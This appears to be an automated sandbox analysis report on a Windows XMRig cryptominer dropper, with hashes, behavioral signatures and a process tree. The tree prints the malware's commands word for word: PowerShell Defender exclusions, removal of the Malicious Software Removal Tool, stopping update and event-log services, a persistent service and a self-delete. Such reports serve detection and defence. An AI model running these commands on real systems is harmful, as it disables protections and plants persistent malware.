Analysis
-
max time kernel
150s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-11-2024 18:21
Static task
static1
Behavioral task
behavioral1
Sample
bc1ff835f337d86678369b7756be12e871f2a289.exe
Resource
win7-20240903-en
General
-
Target
bc1ff835f337d86678369b7756be12e871f2a289.exe
-
Size
5.6MB
-
MD5
752c908ea45382aa7ff4029b9ae84d96
-
SHA1
bc1ff835f337d86678369b7756be12e871f2a289
-
SHA256
2717cae9f8faaedbc37139fb3ddd08e04d9f19b41211ba0f267c62333e799063
-
SHA512
70365ff2c69b9ecb708f122fcbfd141bb360c820b46ecb5288f6ddc9887365dd492cdc8735c465575a01408cad9eb974c494f8326eda3a53cd7cdcd4055ca6bb
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/2136-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2136-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 2604 powershell.exe 1544 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2032 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
fqwofdtexigy.exepid process 476 2760 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
Processes:
pid process 476 -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepid process 2648 powercfg.exe 1316 powercfg.exe 2272 powercfg.exe 2972 powercfg.exe 3004 powercfg.exe 2980 powercfg.exe 2548 powercfg.exe 2784 powercfg.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exebc1ff835f337d86678369b7756be12e871f2a289.exepowershell.exefqwofdtexigy.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe bc1ff835f337d86678369b7756be12e871f2a289.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
fqwofdtexigy.exedescription pid process target process PID 2760 set thread context of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 set thread context of 2136 2760 fqwofdtexigy.exe nslookup.exe -
Processes:
resource yara_rule behavioral1/memory/2136-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2136-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2808 sc.exe 2556 sc.exe 2828 sc.exe 2740 sc.exe 2624 sc.exe 2544 sc.exe 1488 sc.exe 2724 sc.exe 2996 sc.exe 2960 sc.exe 1924 sc.exe 2736 sc.exe 636 sc.exe 2964 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 009dadf38a2cdb01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bc1ff835f337d86678369b7756be12e871f2a289.exepowershell.exefqwofdtexigy.exepowershell.exenslookup.exepid process 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 1544 powershell.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2488 bc1ff835f337d86678369b7756be12e871f2a289.exe 2760 fqwofdtexigy.exe 2604 powershell.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2760 fqwofdtexigy.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe 2136 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid process Token: SeDebugPrivilege 1544 powershell.exe Token: SeShutdownPrivilege 2648 powercfg.exe Token: SeShutdownPrivilege 1316 powercfg.exe Token: SeShutdownPrivilege 2784 powercfg.exe Token: SeShutdownPrivilege 2548 powercfg.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeShutdownPrivilege 3004 powercfg.exe Token: SeShutdownPrivilege 2272 powercfg.exe Token: SeShutdownPrivilege 2980 powercfg.exe Token: SeShutdownPrivilege 2972 powercfg.exe Token: SeLockMemoryPrivilege 2136 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exefqwofdtexigy.exedescription pid process target process PID 2684 wrote to memory of 2664 2684 cmd.exe wusa.exe PID 2684 wrote to memory of 2664 2684 cmd.exe wusa.exe PID 2684 wrote to memory of 2664 2684 cmd.exe wusa.exe PID 2032 wrote to memory of 1756 2032 cmd.exe choice.exe PID 2032 wrote to memory of 1756 2032 cmd.exe choice.exe PID 2032 wrote to memory of 1756 2032 cmd.exe choice.exe PID 2524 wrote to memory of 2712 2524 cmd.exe wusa.exe PID 2524 wrote to memory of 2712 2524 cmd.exe wusa.exe PID 2524 wrote to memory of 2712 2524 cmd.exe wusa.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2180 2760 fqwofdtexigy.exe conhost.exe PID 2760 wrote to memory of 2136 2760 fqwofdtexigy.exe nslookup.exe PID 2760 wrote to memory of 2136 2760 fqwofdtexigy.exe nslookup.exe PID 2760 wrote to memory of 2136 2760 fqwofdtexigy.exe nslookup.exe PID 2760 wrote to memory of 2136 2760 fqwofdtexigy.exe nslookup.exe PID 2760 wrote to memory of 2136 2760 fqwofdtexigy.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2488 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2664 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2740 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2736 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2544 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2828 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2808 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2648 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2784 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2548 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2556 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:2996 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:1488 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\bc1ff835f337d86678369b7756be12e871f2a289.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1756
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2712 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2724 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2624 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2964 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1924 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2960 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2980 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2972 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2272 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2180
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2136
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.6MB
MD5752c908ea45382aa7ff4029b9ae84d96
SHA1bc1ff835f337d86678369b7756be12e871f2a289
SHA2562717cae9f8faaedbc37139fb3ddd08e04d9f19b41211ba0f267c62333e799063
SHA51270365ff2c69b9ecb708f122fcbfd141bb360c820b46ecb5288f6ddc9887365dd492cdc8735c465575a01408cad9eb974c494f8326eda3a53cd7cdcd4055ca6bb